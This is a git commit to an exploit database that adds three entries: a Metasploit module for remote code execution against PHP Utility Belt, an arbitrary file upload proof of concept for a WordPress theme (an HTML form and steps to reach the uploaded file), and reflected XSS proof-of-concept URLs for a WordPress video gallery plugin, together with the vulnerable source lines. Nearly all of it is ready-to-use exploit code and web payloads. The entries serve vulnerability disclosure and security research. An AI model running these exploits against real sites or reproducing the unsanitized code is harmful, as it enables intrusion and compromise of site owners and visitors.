DB: 2016-03-12

Offensive Security · Offensive Security · commit fe74e95fffda · 2016-03-12T05:03:14.000Z
3 new exploits
diff --git a/files.csv b/files.csv
@@ -35786,3 +35786,6 @@ id,file,description,date,author,platform,type,port
 39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Local Root Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0
 39550,platforms/multiple/dos/39550.py,"libotr <= 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0
 39551,platforms/multiple/dos/39551.txt,"Putty pscp <= 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
+39552,platforms/php/webapps/39552.txt,"Wordpress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload Vulnerability",2016-03-11,"Colette Chamberland",php,webapps,80
+39553,platforms/php/webapps/39553.txt,"WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
+39554,platforms/php/remote/39554.rb,"PHP Utility Belt Remote Code Execution",2016-03-11,metasploit,php,remote,80
diff --git a/platforms/php/remote/39554.rb b/platforms/php/remote/39554.rb
@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PHP Utility Belt Remote Code Execution',
+      'Description'    => %q{
+         This module exploits a remote code execution vulnerability in PHP Utility Belt,
+         which is a set of tools for PHP developers and should not be installed in a
+         production environment, since this application runs arbitrary PHP code as an
+         intended functionality.
+      },
+      'Author'         =>
+        [
+          'WICS',     # initial discovery
+          'Jay Turla' # msf
+        ],
+      'References'     =>
+        [
+          ['EDB', '38901'],
+          ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
+        ],
+      'DisclosureDate' => 'Aug 12 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 2000,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          ['PHP Utility Belt', {}]
+        ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
+      ], self.class)
+  end
+
+  def check
+    txt = Rex::Text.rand_text_alpha(8)
+    res = http_send_command("echo #{txt};")
+
+    if res && res.body.include?(txt)
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    http_send_command(payload.encoded)
+  end
+
+  def http_send_command(cmd)
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
+      'vars_post' => {
+        'code' => cmd
+      }
+    )
+  end
+
+end
diff --git a/platforms/php/webapps/39552.txt b/platforms/php/webapps/39552.txt
@@ -0,0 +1,36 @@
+* Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
+* Discovery Date: 02.09.2016
+* Public Disclosure Date:03.09.2016
+* Vendor Homepage: http://www.yourinspirationweb.com
+* Exploit Author: Colette Chamberland (Wordfence)
+* Contact: colette@wordfence.com
+* Version: 1.0.8 (may affect newer versions but this was all I had)
+* Tested on: Wordpress 4.2.x-4.4.x
+ 
+Description
+================================================================================
+ The Beauty Premium theme contains a contact form that is vulnerable to CSRF
+ and File Upload vulnerability in the sendmail.php file. The file attachment
+ gets uploaded to the wordpress upload directory and it is not sanitized,
+ allowing attackers to upload harmful code. 
+ 
+ 
+PoC
+================================================================================
+Google Dork inurl:themes/beauty-premium/ or detect via WPScan:
+
+<form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
+<input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
+<input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
+<input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
+<input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
+<textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test&lt;/textarea&gt;
+<input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
+<li class="submit-button">
+<input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
+<input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
+<input type="hidden" name="id_form" value="test" />
+<input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" />			</li>
+</form>
+
+You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.
diff --git a/platforms/php/webapps/39553.txt b/platforms/php/webapps/39553.txt
@@ -0,0 +1,44 @@
+* Exploit Title: Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities <=8.60
+* Discovery Date: 01.05.2016
+* Public Disclosure Date:03.09.2016
+* Vendor Homepage: http://digitalzoomstudio.net/
+* Software Link: http://codecanyon.net/item/video-gallery-wordpress-plugin-w-youtube-vimeo-/157782
+* Exploit Author: Colette Chamberland (Wordfence)
+* Contact: colette@wordfence.com
+* Version: <=8.60
+* Tested on: Wordpress 4.2.x-4.4.x
+* OVE-20160305-2497
+
+
+Technical details:
+
+Unauthenticated CSRF & XSS
+POC:
+http://[target]/wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
+Line 13-15 (unsanitized input):
+ if(isset($_GET['initer'])){
+            $initer = $_GET['initer'];
+        }
+Line 27 (unsanitized output):
+       <?php echo "var initer = '" . $initer . "';"; ?>
+---------------------------------------       
+Unauthenticated CSRF &  XSS
+POC:
+http://[target]/wp-content/plugins/dzs-videogallery/admin/tagseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
+
+Line 13-15 (unsanitized input):
+ if(isset($_GET['initer'])){
+            $initer = $_GET['initer'];
+        }
+Line 27 (unsanitized output):
+       <?php echo "var initer = '" . $initer . "';"; ?>
+--------------------------------------- 
+Unauthenticated CSRF & XSS:
+POC(s):
+http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1)<%2fscript>894ba&type=&width=
+http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=7934f"><script>alert(1)<%2fscript>99085&width=
+http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=&width=54fd7"><script>alert(1)<%2fscript>4708b
+
+Line 25 & 35 (unsanitized input & direct output):
+$w =  $_GET['width'];
+<param name="flashvars" value="video=' . $_GET['source'] . '&types=' . $_GET['type'] . '&defaultQuality=hd" width="' . $w . '" height="' . $h . '">'.$backup.'
